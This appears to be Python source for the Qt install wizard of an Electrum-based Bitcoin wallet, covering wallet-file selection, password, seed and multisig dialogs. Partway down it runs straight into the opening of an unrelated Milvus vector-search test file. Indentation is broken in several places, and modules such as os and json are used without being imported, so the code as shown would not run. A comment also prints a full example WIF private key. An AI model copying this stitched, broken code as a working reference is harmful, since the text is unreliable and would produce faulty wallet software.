import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional, TYPE_CHECKING
from functools import partial
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea, QApplication)
from electrum.wallet import Wallet, Abstract_Wallet
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.util import UserCancelled, InvalidPassword, WalletFileException, get_new_wallet_name
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack, ReRunDialog
from electrum.network import Network
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton, char_width_in_lineedit, PasswordLineEdit)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from .bip39_recovery_dialog import Bip39RecoveryDialog
from electrum.plugin import run_hook, Plugins
if TYPE_CHECKING:
from electrum.simple_config import SimpleConfig
from electrum.wallet_db import WalletDB
from . import ElectrumGui
# Prompt shown when choosing a password for a new software wallet.
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
                     + _("Leave this field empty if you want to disable encryption.")
# Prompt shown when the keys live on a hardware device and only the file
# itself can be encrypted.
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
                            + _("Your wallet file does not contain secrets, mostly just metadata. ") \
                            + _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
                            + _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
# Help text for the WIF private-key entry dialog.
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
                 _('A few examples') + ':\n' +
                 'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
                 'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
                 'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
# Warning about whitespace in passphrases (see Electrum issue #4566).
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
                                + _("You have multiple consecutive whitespaces or leading/trailing "
                                    "whitespaces in your passphrase.") + " " \
                                + _("This is discouraged.") + " " \
                                + _("Due to a bug, old versions of Electrum will NOT be creating the "
                                    "same wallet as newer versions or other software.")
class CosignWidget(QWidget):
    """Pie-chart widget showing m-of-n cosigners as filled slices."""
    size = 120
    def __init__(self, m, n):
        QWidget.__init__(self)
        self.R = QRect(0, 0, self.size, self.size)
        self.setGeometry(self.R)
        self.setMinimumHeight(self.size)
        self.setMaximumHeight(self.size)
        self.m = m
        self.n = n
    def set_n(self, n):
        self.n = n
        self.update()
    def set_m(self, m):
        self.m = m
        self.update()
    def paintEvent(self, event):
        bgcolor = self.palette().color(QPalette.Background)
        pen = QPen(bgcolor, 7, Qt.SolidLine)
        qp = QPainter()
        qp.begin(self)
        qp.setPen(pen)
        qp.setRenderHint(QPainter.Antialiasing)
        qp.setBrush(Qt.gray)
        # Draw n equal slices; the first m are green (signatures required).
        for i in range(self.n):
            alpha = int(16* 360 * i/self.n)    # Qt pie angles are 1/16 degree
            alpha2 = int(16* 360 * 1/self.n)
            qp.setBrush(Qt.green if i<self.m else Qt.gray)
            qp.drawPie(self.R, alpha, alpha2)
        qp.end()
def wizard_dialog(func):
    """Decorator for wizard pages: drives Back/Cancel navigation and chains
    the page's result into `run_next`, translating GoBack/ReRunDialog into
    stack operations on the wizard."""
    def func_wrapper(*args, **kwargs):
        run_next = kwargs['run_next']
        wizard = args[0]  # type: InstallWizard
        while True:
            #wizard.logger.debug(f"dialog stack. len: {len(wizard._stack)}. stack: {wizard._stack}")
            wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
            # current dialog
            try:
                out = func(*args, **kwargs)
                # Normalise the page's result to a tuple for run_next(*out).
                if type(out) is not tuple:
                    out = (out,)
            except GoBack:
                if not wizard.can_go_back():
                    wizard.close()
                    raise UserCancelled
                else:
                    # to go back from the current dialog, we just let the caller unroll the stack:
                    raise
            # next dialog
            try:
                while True:
                    try:
                        run_next(*out)
                    except ReRunDialog:
                        # restore state, and then let the loop re-run next
                        wizard.go_back(rerun_previous=False)
                    else:
                        break
            except GoBack as e:
                # to go back from the next dialog, we ask the wizard to restore state
                wizard.go_back(rerun_previous=False)
                # and we re-run the current dialog
                if wizard.can_go_back():
                    # also rerun any calculations that might have populated the inputs to the current dialog,
                    # by going back to just after the *previous* dialog finished
                    raise ReRunDialog() from e
                else:
                    continue
            else:
                break
    return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
    """Raised when the selected wallet file is already loaded by the daemon;
    carries the already-open wallet object."""
    def __init__(self, wallet: Abstract_Wallet):
        super().__init__()
        self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
    def __init__(self, config: 'SimpleConfig', app: QApplication, plugins: 'Plugins', *, gui_object: 'ElectrumGui'):
        """Build the wizard window: title/logo, scrollable content area,
        Back/Next buttons, and the nested event loop the buttons drive."""
        QDialog.__init__(self, None)
        BaseWizard.__init__(self, config, plugins)
        self.setWindowTitle('Electrum - ' + _('Install Wizard'))
        self.app = app
        self.config = config
        self.gui_thread = gui_object.gui_thread
        self.setMinimumSize(600, 400)
        self.accept_signal.connect(self.accept)
        self.title = QLabel()
        self.main_widget = QWidget()
        self.back_button = QPushButton(_("Back"), self)
        self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
        self.next_button = QPushButton(_("Next"), self)
        self.next_button.setDefault(True)
        self.logo = QLabel()
        self.please_wait = QLabel(_("Please wait..."))
        self.please_wait.setAlignment(Qt.AlignCenter)
        self.icon_filename = None
        # Nested event loop; exit codes: 0 = cancel, 1 = back, 2 = next.
        self.loop = QEventLoop()
        self.rejected.connect(lambda: self.loop.exit(0))
        self.back_button.clicked.connect(lambda: self.loop.exit(1))
        self.next_button.clicked.connect(lambda: self.loop.exit(2))
        outer_vbox = QVBoxLayout(self)
        inner_vbox = QVBoxLayout()
        inner_vbox.addWidget(self.title)
        inner_vbox.addWidget(self.main_widget)
        inner_vbox.addStretch(1)
        inner_vbox.addWidget(self.please_wait)
        inner_vbox.addStretch(1)
        # Page content lives in a scroll area so long pages stay usable.
        scroll_widget = QWidget()
        scroll_widget.setLayout(inner_vbox)
        scroll = QScrollArea()
        scroll.setWidget(scroll_widget)
        scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
        scroll.setWidgetResizable(True)
        icon_vbox = QVBoxLayout()
        icon_vbox.addWidget(self.logo)
        icon_vbox.addStretch(1)
        hbox = QHBoxLayout()
        hbox.addLayout(icon_vbox)
        hbox.addSpacing(5)
        hbox.addWidget(scroll)
        hbox.setStretchFactor(scroll, 1)
        outer_vbox.addLayout(hbox)
        outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
        self.set_icon('electrum-bsty.png')
        self.show()
        self.raise_()
        self.refresh_gui()  # Need for QT on MacOSX. Lame.
    def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
        """Page asking the user to pick (or create) a wallet file.

        Returns (path, storage); storage is None when the file does not
        exist yet.  May raise UserCancelled or WalletAlreadyOpenInMemory.
        """
        vbox = QVBoxLayout()
        hbox = QHBoxLayout()
        hbox.addWidget(QLabel(_('Wallet') + ':'))
        name_e = QLineEdit()
        hbox.addWidget(name_e)
        button = QPushButton(_('Choose...'))
        hbox.addWidget(button)
        vbox.addLayout(hbox)
        msg_label = WWLabel('')
        vbox.addWidget(msg_label)
        hbox2 = QHBoxLayout()
        pw_e = PasswordLineEdit('', self)
        pw_e.setFixedWidth(17 * char_width_in_lineedit())
        pw_label = QLabel(_('Password') + ':')
        hbox2.addWidget(pw_label)
        hbox2.addWidget(pw_e)
        hbox2.addStretch()
        vbox.addLayout(hbox2)
        vbox.addSpacing(50)
        vbox_create_new = QVBoxLayout()
        vbox_create_new.addWidget(QLabel(_('Alternatively') + ':'), alignment=Qt.AlignLeft)
        button_create_new = QPushButton(_('Create New Wallet'))
        button_create_new.setMinimumWidth(120)
        vbox_create_new.addWidget(button_create_new, alignment=Qt.AlignLeft)
        widget_create_new = QWidget()
        widget_create_new.setLayout(vbox_create_new)
        vbox_create_new.setContentsMargins(0, 0, 0, 0)
        vbox.addWidget(widget_create_new)
        self.set_layout(vbox, title=_('Electrum wallet'))
        temp_storage = None  # type: Optional[WalletStorage]
        wallet_folder = os.path.dirname(path)
        def on_choose():
            # File-picker for an existing wallet file.
            path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
            if path:
                name_e.setText(path)
        def on_filename(filename):
            # Re-validate whenever the filename field changes.
            # FIXME? "filename" might contain ".." (etc) and hence sketchy path traversals are possible
            nonlocal temp_storage
            temp_storage = None
            msg = None
            if filename:
                path = os.path.join(wallet_folder, filename)
                wallet_from_memory = get_wallet_from_daemon(path)
                try:
                    if wallet_from_memory:
                        temp_storage = wallet_from_memory.storage  # type: Optional[WalletStorage]
                    else:
                        temp_storage = WalletStorage(path)
                except (StorageReadWriteError, WalletFileException) as e:
                    msg = _('Cannot read file') + f'\n{repr(e)}'
                except Exception as e:
                    self.logger.exception('')
                    msg = _('Cannot read file') + f'\n{repr(e)}'
            else:
                msg = ""
            self.next_button.setEnabled(temp_storage is not None)
            user_needs_to_enter_password = False
            if temp_storage:
                if not temp_storage.file_exists():
                    msg =_("This file does not exist.") + '\n' \
                         + _("Press 'Next' to create this wallet, or choose another file.")
                elif not wallet_from_memory:
                    if temp_storage.is_encrypted_with_user_pw():
                        msg = _("This file is encrypted with a password.") + '\n' \
                              + _('Enter your password or choose another file.')
                        user_needs_to_enter_password = True
                    elif temp_storage.is_encrypted_with_hw_device():
                        msg = _("This file is encrypted using a hardware device.") + '\n' \
                              + _("Press 'Next' to choose device to decrypt.")
                    else:
                        msg = _("Press 'Next' to open this wallet.")
                else:
                    msg = _("This file is already open in memory.") + "\n" \
                          + _("Press 'Next' to create/focus window.")
            if msg is None:
                msg = _('Cannot read file')
            msg_label.setText(msg)
            widget_create_new.setVisible(bool(temp_storage and temp_storage.file_exists()))
            if user_needs_to_enter_password:
                pw_label.show()
                pw_e.show()
                pw_e.setFocus()
            else:
                pw_label.hide()
                pw_e.hide()
        button.clicked.connect(on_choose)
        button_create_new.clicked.connect(
            partial(
                name_e.setText,
                get_new_wallet_name(wallet_folder)))
        name_e.textChanged.connect(on_filename)
        name_e.setText(os.path.basename(path))
        def run_user_interaction_loop():
            # Loop until a usable (existing+decrypted, or brand-new) file
            # has been chosen, or the user cancels.
            while True:
                if self.loop.exec_() != 2:  # 2 = next
                    raise UserCancelled()
                assert temp_storage
                if temp_storage.file_exists() and not temp_storage.is_encrypted():
                    break
                if not temp_storage.file_exists():
                    break
                wallet_from_memory = get_wallet_from_daemon(temp_storage.path)
                if wallet_from_memory:
                    raise WalletAlreadyOpenInMemory(wallet_from_memory)
                if temp_storage.file_exists() and temp_storage.is_encrypted():
                    if temp_storage.is_encrypted_with_user_pw():
                        password = pw_e.text()
                        try:
                            temp_storage.decrypt(password)
                            break
                        except InvalidPassword as e:
                            self.show_message(title=_('Error'), msg=str(e))
                            continue
                        except BaseException as e:
                            self.logger.exception('')
                            self.show_message(title=_('Error'), msg=repr(e))
                            raise UserCancelled()
                    elif temp_storage.is_encrypted_with_hw_device():
                        try:
                            self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=temp_storage)
                        except InvalidPassword as e:
                            self.show_message(title=_('Error'),
                                              msg=_('Failed to decrypt using this hardware device.') + '\n' +
                                                  _('If you use a passphrase, make sure it is correct.'))
                            self.reset_stack()
                            # NOTE(review): the recursive result is discarded
                            # by the caller below — confirm against upstream.
                            return self.select_storage(path, get_wallet_from_daemon)
                        except (UserCancelled, GoBack):
                            raise
                        except BaseException as e:
                            self.logger.exception('')
                            self.show_message(title=_('Error'), msg=repr(e))
                            raise UserCancelled()
                        if temp_storage.is_past_initial_decryption():
                            break
                        else:
                            raise UserCancelled()
                    else:
                        raise Exception('Unexpected encryption version')
        try:
            run_user_interaction_loop()
        finally:
            try:
                # Zero the password field even on error paths.
                pw_e.clear()
            except RuntimeError:  # wrapped C/C++ object has been deleted.
                pass  # happens when decrypting with hw device
        return temp_storage.path, (temp_storage if temp_storage.file_exists() else None)
    def run_upgrades(self, storage: WalletStorage, db: 'WalletDB') -> None:
        """Interactively split, complete, or upgrade a legacy wallet file
        before it is opened.  May raise UserCancelled or WalletFileException."""
        path = storage.path
        if db.requires_split():
            self.hide()
            msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
                    "Do you want to split your wallet into multiple files?").format(path)
            if not self.question(msg):
                return
            file_list = db.split_accounts(path)
            msg = _('Your accounts have been moved to') + ':\n' + '\n'.join(file_list) + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
            if self.question(msg):
                os.remove(path)
                self.show_warning(_('The file was removed'))
            # raise now, to avoid having the old storage opened
            raise UserCancelled()
        action = db.get_action()
        if action and db.requires_upgrade():
            raise WalletFileException('Incomplete wallet files cannot be upgraded.')
        if action:
            self.hide()
            msg = _("The file '{}' contains an incompletely created wallet.\n"
                    "Do you want to complete its creation now?").format(path)
            if not self.question(msg):
                if self.question(_("Do you want to delete '{}'?").format(path)):
                    os.remove(path)
                    self.show_warning(_('The file was removed'))
                return
            self.show()
            # Resume the interrupted creation flow, then persist its result.
            self.data = json.loads(storage.read())
            self.run(action)
            for k, v in self.data.items():
                db.put(k, v)
            db.write(storage)
            return
        if db.requires_upgrade():
            self.upgrade_db(storage, db)
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
self.logger.error("on_error", exc_info=exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
    def exec_layout(self, layout, title=None, raise_on_cancel=True,
                    next_enabled=True, focused_widget=None):
        """Show *layout*, run the nested event loop, and return its exit code.

        Exit codes: 0 = cancelled (raises UserCancelled unless
        raise_on_cancel is False), 1 = back (raises GoBack), 2 = next.
        """
        self.set_layout(layout, title, next_enabled)
        if focused_widget:
            focused_widget.setFocus()
        result = self.loop.exec_()
        if not result and raise_on_cancel:
            raise UserCancelled()
        if result == 1:
            raise GoBack from None
        # Switch to the "please wait" page until the next layout is set.
        self.title.setVisible(False)
        self.back_button.setEnabled(False)
        self.next_button.setEnabled(False)
        self.main_widget.setVisible(False)
        self.please_wait.setVisible(True)
        self.refresh_gui()
        return result
    def refresh_gui(self):
        """Force the UI to repaint immediately."""
        # For some reason, to refresh the GUI this needs to be called twice
        self.app.processEvents()
        self.app.processEvents()
    def remove_from_recently_open(self, filename):
        """Drop *filename* from the config's recently-opened wallet list."""
        self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi, config=self.config)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(
title=message,
is_seed=is_seed,
options=options,
parent=self,
config=self.config,
)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.seed_type, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
    """Prompt for cosigner number *index*'s master public/private key."""
    title = _("Add Cosigner") + " %d"%index
    parts = [
        _('Please enter the master public key (xpub) of your cosigner.'),
        _('Enter their master private key (xprv) if you want to be able to sign for them.'),
    ]
    return self.text_input(title, ' '.join(parts), is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
    """Ask for an existing seed phrase; returns (seed, seed_type, is_ext)."""
    # Offer only the seed options this wizard instance has enabled,
    # preserving the ext -> bip39 -> slip39 order.
    flags = (('ext', self.opt_ext),
             ('bip39', self.opt_bip39),
             ('slip39', self.opt_slip39))
    options = [name for name, enabled in flags if enabled]
    return self.seed_input(
        _('Enter Seed'),
        _('Please enter your seed phrase in order to restore your wallet.'),
        test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, seed, test):
    """Make the user retype their seed; returns the retyped seed text."""
    # Clear the clipboard so the seed cannot simply be pasted back.
    self.app.clipboard().clear()
    warning = ' '.join([
        _('Your seed is important!'),
        _('If you lose your seed, your money will be permanently lost.'),
        _('To make sure that you have properly saved your seed, please retype it here.')
    ])
    typed_seed, _seed_type, _is_ext = self.seed_input(_('Confirm Seed'), warning, test, None)
    return typed_seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
    """Display a freshly generated seed; returns whether 'ext' was ticked."""
    page = SeedLayout(
        seed=seed_text,
        title=_("Your wallet generation seed is:"),
        msg=True,
        options=['ext'],
        config=self.config,
    )
    self.exec_layout(page)
    return page.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
    """Run a password-entry page; returns (password, encrypt_checked)."""
    playout = PasswordLayout(
        msg=msg, kind=kind, OK_button=self.next_button,
        force_disable_encrypt_cb=force_disable_encrypt_cb)
    playout.encrypt_cb.setChecked(True)  # default to encrypting
    try:
        self.exec_layout(playout.layout(), focused_widget=playout.new_pw)
        return playout.new_password(), playout.encrypt_cb.isChecked()
    finally:
        # Wipe the entered passwords from the widgets regardless of outcome.
        playout.clear_password_fields()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
    """Request the user enter a new password and confirm it. Return
    the password or None for no password."""
    # pw_layout returns a (password, encrypt_storage) pair; the
    # @wizard_dialog decorator forwards it to run_next.
    return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
    """Ask (for hardware wallets) whether to encrypt the wallet file."""
    hw_layout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
    hw_layout.encrypt_cb.setChecked(True)  # default to encrypting
    self.exec_layout(hw_layout.layout())
    return hw_layout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
    """Wizard step that just asks the user to acknowledge *message*."""
    self.confirm(message, title)
def confirm(self, message, title):
    """Show *message* and wait for the user to acknowledge it."""
    box = QVBoxLayout()
    box.addWidget(WWLabel(message))
    self.exec_layout(box, title)
@wizard_dialog
def action_dialog(self, action, run_next):
    """Execute a wizard *action* via self.run; shows no page of its own."""
    self.run(action)
def terminate(self, **kwargs):
    """Finish the wizard by emitting accept_signal (extra kwargs ignored)."""
    self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
    """Run *task* on a background thread while showing *msg*.

    Blocks (while keeping the GUI responsive) until the thread exits,
    then calls *on_finished*, if given, on this (GUI) thread.
    """
    label = WWLabel(msg)
    vbox = QVBoxLayout()
    vbox.addSpacing(100)
    label.setMinimumWidth(300)
    label.setAlignment(Qt.AlignCenter)
    vbox.addWidget(label)
    self.set_layout(vbox, next_enabled=False)
    self.back_button.setEnabled(False)
    t = threading.Thread(target=task)
    t.start()
    # Poll at roughly 60 Hz: pump Qt events while the worker runs so the
    # window keeps repainting instead of freezing.
    while True:
        t.join(1.0/60)
        if t.is_alive():
            self.refresh_gui()
        else:
            break
    if on_finished:
        on_finished()
def run_task_without_blocking_gui(self, task, *, msg=None):
    """Execute *task* under a waiting dialog and return its result,
    re-raising any exception the task threw.  GUI thread only."""
    assert self.gui_thread == threading.current_thread(), 'must be called from GUI thread'
    if msg is None:
        msg = _("Please wait...")
    # The worker records either a result or an error here.
    outcome = {}
    def wrapper():
        try:
            outcome['result'] = task()
        except Exception as e:
            outcome['error'] = e
    self.waiting_dialog(wrapper, msg=msg)
    if 'error' in outcome:
        raise outcome['error']
    return outcome.get('result')
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
    """Present *choices* ((value, label) pairs); return the chosen value."""
    values = [choice[0] for choice in choices]
    labels = [choice[1] for choice in choices]
    clayout = ChoicesLayout(message, labels)
    vbox = QVBoxLayout()
    vbox.addLayout(clayout.layout())
    self.exec_layout(vbox, title)
    return values[clayout.selected_index()]
def query_choice(self, msg, choices):
    """Called by hardware wallets: pick one of *choices*, return its index."""
    picker = ChoicesLayout(msg, choices)
    container = QVBoxLayout()
    container.addLayout(picker.layout())
    self.exec_layout(container, '')
    return picker.selected_index()
@wizard_dialog
def derivation_and_script_type_gui_specific_dialog(
        self,
        *,
        title: str,
        message1: str,
        choices: List[Tuple[str, str, str]],
        hide_choices: bool = False,
        message2: str,
        test_text: Callable[[str], int],
        run_next,
        default_choice_idx: int = 0,
        get_account_xpub=None,
) -> Tuple[str, str]:
    """Let the user pick a script type and edit its derivation path.

    Each entry of *choices* is (value, label, default_derivation_text).
    Returns (derivation_path_text, chosen_script_type_value).
    """
    vbox = QVBoxLayout()
    if get_account_xpub:
        button = QPushButton(_("Detect Existing Accounts"))
        # Called by Bip39RecoveryDialog when the user picks a detected
        # account: select the matching script-type button and fill in the
        # path.  NOTE: `clayout` and `line` are defined further down; this
        # closure only runs after the page is fully built.
        def on_account_select(account):
            script_type = account["script_type"]
            if script_type == "p2pkh":
                script_type = "standard"
            button_index = c_values.index(script_type)
            button = clayout.group.buttons()[button_index]
            button.setChecked(True)
            line.setText(account["derivation_path"])
        button.clicked.connect(lambda: Bip39RecoveryDialog(self, get_account_xpub, on_account_select))
        vbox.addWidget(button, alignment=Qt.AlignLeft)
        vbox.addWidget(QLabel(_("Or")))
    c_values = [x[0] for x in choices]
    c_titles = [x[1] for x in choices]
    c_default_text = [x[2] for x in choices]
    # Selecting a script type resets the path field to that type's default.
    def on_choice_click(clayout):
        idx = clayout.selected_index()
        line.setText(c_default_text[idx])
    clayout = ChoicesLayout(message1, c_titles, on_choice_click,
                            checked_index=default_choice_idx)
    if not hide_choices:
        vbox.addLayout(clayout.layout())
    vbox.addWidget(WWLabel(message2))
    line = QLineEdit()
    # "Next" is enabled only while the typed path passes test_text.
    def on_text_change(text):
        self.next_button.setEnabled(test_text(text))
    line.textEdited.connect(on_text_change)
    on_choice_click(clayout)  # set default text for "line"
    vbox.addWidget(line)
    self.exec_layout(vbox, title)
    choice = c_values[clayout.selected_index()]
    return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
                presets=(), warn_issue4566=False):
    """Single-line text-input page; returns the entered text.

    *test* gates the Next button; *presets* is an iterable of
    (button_label, text) shortcuts; *warn_issue4566* shows a passphrase
    whitespace warning (Electrum issue #4566).
    """
    vbox = QVBoxLayout()
    vbox.addWidget(WWLabel(message))
    line = QLineEdit()
    line.setText(default)
    def f(text):
        self.next_button.setEnabled(test(text))
        if warn_issue4566:
            # Warn when the entry differs from its whitespace-normalised
            # form (leading/trailing/multiple spaces).
            text_whitespace_normalised = ' '.join(text.split())
            warn_issue4566_label.setVisible(text != text_whitespace_normalised)
    line.textEdited.connect(f)
    vbox.addWidget(line)
    vbox.addWidget(WWLabel(warning))
    # Hidden until f() detects non-normalised whitespace; defined after f
    # but only referenced once the user types.
    warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
    warn_issue4566_label.setVisible(False)
    vbox.addWidget(warn_issue4566_label)
    for preset in presets:
        button = QPushButton(preset[0])
        # Preset text is bound as a default argument to avoid the
        # late-binding-closure pitfall.
        button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
        button.setMinimumWidth(150)
        hbox = QHBoxLayout()
        hbox.addWidget(button, alignment=Qt.AlignCenter)
        vbox.addLayout(hbox)
    self.exec_layout(vbox, title, next_enabled=test(default))
    return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
    """Display the wallet's master public key for sharing with cosigners."""
    msg = ' '.join([
        _("Here is your master public key."),
        _("Please share it with your cosigners.")
    ])
    xpub_layout = SeedLayout(
        xpub,
        title=msg,
        icon=False,
        for_seed_words=False,
        config=self.config,
    )
    outer = QVBoxLayout()
    outer.addLayout(xpub_layout.layout())
    self.exec_layout(outer, _('Master Public Key'))
    return None
def init_network(self, network: 'Network'):
    """Ask how to connect to a server and apply the choice to *network*."""
    message = _("Electrum communicates with remote servers to get "
                "information about your transactions and addresses. The "
                "servers all fulfill the same purpose only differing in "
                "hardware. In most cases you simply want to let Electrum "
                "pick one at random. However if you prefer feel free to "
                "select a server manually.")
    choices = [_("Auto connect"), _("Select server manually")]
    title = _("How do you want to connect to a server? ")
    clayout = ChoicesLayout(message, choices)
    self.back_button.setText(_('Cancel'))
    self.exec_layout(clayout.layout(), title)
    r = clayout.selected_index()
    if r == 1:
        # Manual selection: show the server picker; persist only if the
        # user accepted it.
        nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
        if self.exec_layout(nlayout.layout()):
            nlayout.accept()
            self.config.set_key('auto_connect', network.auto_connect, True)
    else:
        # Auto-connect: enable on the live network object and persist.
        network.auto_connect = True
        self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
    """Choose an m-of-n multisig configuration; returns (m, n).

    Two sliders: n (number of cosigners, 2..15) and m (signatures
    required, 1..n).  m's maximum follows n.
    """
    cw = CosignWidget(2, 2)
    m_edit = QSlider(Qt.Horizontal, self)
    n_edit = QSlider(Qt.Horizontal, self)
    n_edit.setMinimum(2)
    n_edit.setMaximum(15)
    m_edit.setMinimum(1)
    m_edit.setMaximum(2)
    n_edit.setValue(2)
    m_edit.setValue(2)
    n_label = QLabel()
    m_label = QLabel()
    grid = QGridLayout()
    grid.addWidget(n_label, 0, 0)
    grid.addWidget(n_edit, 0, 1)
    grid.addWidget(m_label, 1, 0)
    grid.addWidget(m_edit, 1, 1)
    # NOTE: both callbacks reference backup_warning_label, which is
    # created further down; they are first invoked via on_n(2)/on_m(2)
    # after it exists.
    def on_m(m):
        m_label.setText(_('Require {0} signatures').format(m))
        cw.set_m(m)
        backup_warning_label.setVisible(cw.m != cw.n)
    def on_n(n):
        n_label.setText(_('From {0} cosigners').format(n))
        cw.set_n(n)
        m_edit.setMaximum(n)  # m can never exceed n
        backup_warning_label.setVisible(cw.m != cw.n)
    n_edit.valueChanged.connect(on_n)
    m_edit.valueChanged.connect(on_m)
    vbox = QVBoxLayout()
    vbox.addWidget(cw)
    vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
    vbox.addLayout(grid)
    vbox.addSpacing(2 * char_width_in_lineedit())
    # Shown only when m != n, i.e. when losing one cosigner's xpub would
    # make restoration impossible without the others' backups.
    backup_warning_label = WWLabel(_("Warning: to be able to restore a multisig wallet, "
                                    "you should include the master public key for each cosigner "
                                    "in all of your backups."))
    vbox.addWidget(backup_warning_label)
    on_n(2)
    on_m(2)
    self.exec_layout(vbox, _("Multi-Signature Wallet"))
    m = int(m_edit.value())
    n = int(n_edit.value())
    return (m, n)
|
test_search_20.py | import pytest
from time import sleep
from base.client_base import TestcaseBase
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from utils.utils import *
from common.constants import *
# --- Shared constants and prebuilt fixtures for the search test suite ---
prefix = "search_collection"   # collection-name prefix for this suite
search_num = 10
max_dim = ct.max_dim
epsilon = ct.epsilon
gracefulTime = ct.gracefulTime
default_nb = ct.default_nb
default_nb_medium = ct.default_nb_medium
default_nq = ct.default_nq
default_dim = ct.default_dim
default_limit = ct.default_limit
default_search_exp = "int64 >= 0"
default_search_field = ct.default_float_vec_field_name
default_search_params = ct.default_search_params
default_int64_field_name = ct.default_int64_field_name
default_float_field_name = ct.default_float_field_name
default_bool_field_name = ct.default_bool_field_name
# Query vectors shared by most tests below.
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
uid = "test_search"
nq = 1
# NOTE(review): this rebinds `epsilon` (already set to ct.epsilon above) —
# confirm which value the suite actually intends.
epsilon = 0.001
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
search_param = {"nprobe": 1}
entity = gen_entities(1, is_normal=True)
entities = gen_entities(default_nb, is_normal=True)
raw_vectors, binary_entities = gen_binary_entities(default_nb)
default_query, _ = gen_search_vectors_params(field_name, entities, default_top_k, nq)
# default_binary_query, _ = gen_search_vectors_params(binary_field_name, binary_entities, default_top_k, nq)
class TestCollectionSearchInvalid(TestcaseBase):
""" Test case of search interface """
@pytest.fixture(scope="function", params=ct.get_invalid_vectors)
def get_invalid_vectors(self, request):
    """Parametrized fixture yielding invalid search-vector values."""
    yield request.param
